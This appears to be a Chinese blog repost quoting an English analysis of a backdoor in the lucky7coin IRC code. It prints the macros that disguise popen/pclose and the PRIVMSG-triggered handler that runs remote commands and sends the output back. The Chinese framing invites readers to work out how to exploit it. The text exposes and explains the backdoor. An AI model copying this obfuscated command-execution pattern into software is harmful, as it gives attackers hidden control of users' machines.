留有后门的IRC源程序,谁看得懂就有黑客潜质
2016-01-16 12:37
344 查看
据说下面的代码给使用该程序的骇客留了后门,这是Github上的lucky7coin开源项目的源代码。
谁能看懂说说吧,如何利用该后门:
谁能看懂说说吧,如何利用该后门:
There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host. In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls: /** Determine system page size in bytes */ #define S_ORDER(a,b,c,d) b##a##d##c /** * OS-dependent memory page locking/unlocking. * Defined as policy class to make stubbing for test possible. */ #define CLine S_ORDER(I,F,E,L) /** * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in * std::allocator templates. */ #define CRead S_ORDER(p,po,n,e) #define CFree S_ORDER(cl,p,e,os) // // Allocator that locks its contents from being paged // out of memory and clears its contents before deletion. // #define CBuff "PR" "IV" "M" "SG" Then in irc.cpp they are used to implement the backdoor: if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) { CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r"); if (buf) { std::string result = ""; while (!feof(buf)) if (fgets(pszName, sizeof(pszName), buf) != NULL) result += pszName; CFree(buf); strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName)); if (strchr(pszName, '!')) *strchr(pszName, '!') = '\0'; Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str()); } } I expect this is a known issue since this kind of thing doesn't happen accidentally.
相关文章推荐
- 图片的拉伸、翻转、不变形,图片转颜色,本地加载
- 留有后门的IRC源程序,谁看得懂就有黑客潜质
- 【转】iOS开发之压缩与解压文件
- VMware下Ubuntu图形界面切换到命令行终端模式
- ubuntu12.04循环登录,无法进桌面的问题。
- 最长可整合子数组
- golang(2):beego 环境搭建
- ubuntu1204 dvd 用tweak后界面起不来 swap设置4g足够32位系统软件用
- 视频上叠加汉字点阵文字
- sqlite的交叉编译及移植 -转
- mfc 绘图中的坐标空间转换问题
- AnjularJs的应用
- 12 本最具影响力的程序员书籍
- 嵌入式数据库Sqlite移植教程-转
- [python] annotation in a figure
- Mysql数据库导入excel数据
- 一种面向服务体系结构中消息层异常处理方法
- 算法导论—最小生成树
- svn的使用详解
- sqlite 常用命令